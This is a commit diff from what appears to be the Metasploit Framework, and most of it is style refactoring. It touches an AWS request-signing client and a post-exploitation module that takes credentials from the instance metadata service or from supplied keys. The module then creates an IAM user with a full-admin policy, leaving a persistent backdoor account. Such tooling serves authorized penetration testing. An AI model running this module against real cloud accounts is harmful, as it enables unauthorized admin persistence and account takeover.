commit
48c9e7dfd5
|
@ -6,6 +6,7 @@ module Metasploit
|
||||||
module Client
|
module Client
|
||||||
USER_AGENT = "aws-sdk-ruby2/2.6.27 ruby/2.3.2 x86_64-darwin15"
|
USER_AGENT = "aws-sdk-ruby2/2.6.27 ruby/2.3.2 x86_64-darwin15"
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
# because Post modules require these to be defined when including HttpClient
|
# because Post modules require these to be defined when including HttpClient
|
||||||
def register_autofilter_ports(ports=[]); end
|
def register_autofilter_ports(ports=[]); end
|
||||||
def register_autofilter_hosts(ports=[]); end
|
def register_autofilter_hosts(ports=[]); end
|
||||||
|
@ -48,7 +49,7 @@ module Metasploit
|
||||||
if headers.nil? || !headers.instance_of?(Hash) || body_digest.nil? || !body_digest.instance_of?(String)
|
if headers.nil? || !headers.instance_of?(Hash) || body_digest.nil? || !body_digest.instance_of?(String)
|
||||||
return nil, nil
|
return nil, nil
|
||||||
end
|
end
|
||||||
headers_block = headers.sort_by(&:first).map do |k,v|
|
headers_block = headers.sort_by(&:first).map do |k, v|
|
||||||
v = "#{v},#{v}" if k == 'Host'
|
v = "#{v},#{v}" if k == 'Host'
|
||||||
"#{k.downcase}:#{v}"
|
"#{k.downcase}:#{v}"
|
||||||
end.join("\n")
|
end.join("\n")
|
||||||
|
@ -76,8 +77,8 @@ module Metasploit
|
||||||
|
|
||||||
def body(vars_post)
|
def body(vars_post)
|
||||||
pstr = ""
|
pstr = ""
|
||||||
vars_post.each_pair do |var,val|
|
vars_post.each_pair do |var, val|
|
||||||
pstr << '&' if pstr.length > 0
|
pstr << '&' unless pstr.empty?
|
||||||
pstr << var
|
pstr << var
|
||||||
pstr << '='
|
pstr << '='
|
||||||
pstr << val
|
pstr << val
|
||||||
|
@ -106,7 +107,7 @@ module Metasploit
|
||||||
def print_hsh(hsh)
|
def print_hsh(hsh)
|
||||||
return if hsh.nil? || !hsh.instance_of?(Hash)
|
return if hsh.nil? || !hsh.instance_of?(Hash)
|
||||||
hsh.each do |key, value|
|
hsh.each do |key, value|
|
||||||
print_warning "#{key}: #{value}"
|
vprint_status "#{key}: #{value}"
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -1,3 +1,8 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
require 'metasploit/framework/aws/client'
|
require 'metasploit/framework/aws/client'
|
||||||
|
|
||||||
|
@ -5,42 +10,46 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
include Metasploit::Framework::Aws::Client
|
include Metasploit::Framework::Aws::Client
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => "Create an AWS IAM User",
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
This module will attempt to create an AWS (Amazon Web Services) IAM
|
'Name' => "Create an AWS IAM User",
|
||||||
(Identity and Access Management) user with Admin privileges.
|
'Description' => %q{
|
||||||
},
|
This module will attempt to create an AWS (Amazon Web Services) IAM
|
||||||
'License' => MSF_LICENSE,
|
(Identity and Access Management) user with Admin privileges.
|
||||||
'Platform' => %w(unix),
|
},
|
||||||
'SessionTypes' => %w(shell meterpreter),
|
'License' => MSF_LICENSE,
|
||||||
'Author' => ['Javier Godinez <godinezj[at]gmail.com>'],
|
'Platform' => %w(unix),
|
||||||
'References' => [
|
'SessionTypes' => %w(shell meterpreter),
|
||||||
[ 'URL', 'https://github.com/devsecops/bootcamp/raw/master/Week-6/slides/june-DSO-bootcamp-week-six-lesson-three.pdf' ]
|
'Author' => ['Javier Godinez <godinezj[at]gmail.com>'],
|
||||||
]
|
'References' => [
|
||||||
))
|
[ 'URL', 'https://github.com/devsecops/bootcamp/raw/master/Week-6/slides/june-DSO-bootcamp-week-six-lesson-three.pdf' ]
|
||||||
|
]
|
||||||
|
)
|
||||||
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
|
OptString.new('IAM_USERNAME', [false, 'Name of the user to be created (leave empty or unset to use a random name)', '']),
|
||||||
|
OptString.new('AccessKeyId', [false, 'AWS access key', '']),
|
||||||
|
OptString.new('SecretAccessKey', [false, 'AWS secret key', '']),
|
||||||
|
OptString.new('Token', [false, 'AWS session token', ''])
|
||||||
|
]
|
||||||
|
)
|
||||||
|
register_advanced_options(
|
||||||
|
[
|
||||||
|
OptString.new('METADATA_IP', [true, 'The metadata service IP', '169.254.169.254']),
|
||||||
OptString.new('RHOST', [true, 'AWS IAM Endpoint', 'iam.amazonaws.com']),
|
OptString.new('RHOST', [true, 'AWS IAM Endpoint', 'iam.amazonaws.com']),
|
||||||
OptString.new('RPORT', [true, 'AWS IAM Endpoint TCP Port', 443]),
|
OptString.new('RPORT', [true, 'AWS IAM Endpoint TCP Port', 443]),
|
||||||
OptString.new('SSL', [true, 'AWS IAM Endpoint SSL', true]),
|
OptString.new('SSL', [true, 'AWS IAM Endpoint SSL', true]),
|
||||||
OptString.new('IAM_GROUP_POL', [true, 'IAM group policy to use', '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*" }]}']),
|
OptString.new('IAM_GROUP_POL', [true, 'IAM group policy to use', '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*" }]}']),
|
||||||
OptString.new('IAM_USERNAME', [false, 'Username for the user to be created', '']),
|
|
||||||
OptString.new('Region', [true, 'The default region', 'us-east-1' ])
|
OptString.new('Region', [true, 'The default region', 'us-east-1' ])
|
||||||
])
|
]
|
||||||
register_advanced_options(
|
)
|
||||||
[
|
|
||||||
OptString.new('METADATA_IP', [true, 'The metadata service IP', '169.254.169.254']),
|
|
||||||
OptString.new('AccessKeyId', [false, 'AWS access key', '']),
|
|
||||||
OptString.new('SecretAccessKey', [false, 'AWS secret key', '']),
|
|
||||||
OptString.new('Token', [false, 'AWS session token', ''])
|
|
||||||
])
|
|
||||||
deregister_options('VHOST')
|
deregister_options('VHOST')
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def run
|
def run
|
||||||
# setup creds for making IAM API calls
|
# setup creds for making IAM API calls
|
||||||
creds = metadata_creds
|
creds = metadata_creds
|
||||||
|
@ -58,7 +67,7 @@ class MetasploitModule < Msf::Post
|
||||||
end
|
end
|
||||||
|
|
||||||
# create user
|
# create user
|
||||||
username = datastore['IAM_USERNAME'].empty? ? Rex::Text.rand_text_alphanumeric(16) : datastore['IAM_USERNAME']
|
username = datastore['IAM_USERNAME'].blank? ? Rex::Text.rand_text_alphanumeric(16) : datastore['IAM_USERNAME']
|
||||||
print_status("Creating user: #{username}")
|
print_status("Creating user: #{username}")
|
||||||
action = 'CreateUser'
|
action = 'CreateUser'
|
||||||
doc = call_iam(creds, 'Action' => action, 'UserName' => username)
|
doc = call_iam(creds, 'Action' => action, 'UserName' => username)
|
||||||
|
@ -119,4 +128,3 @@ class MetasploitModule < Msf::Post
|
||||||
{}
|
{}
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue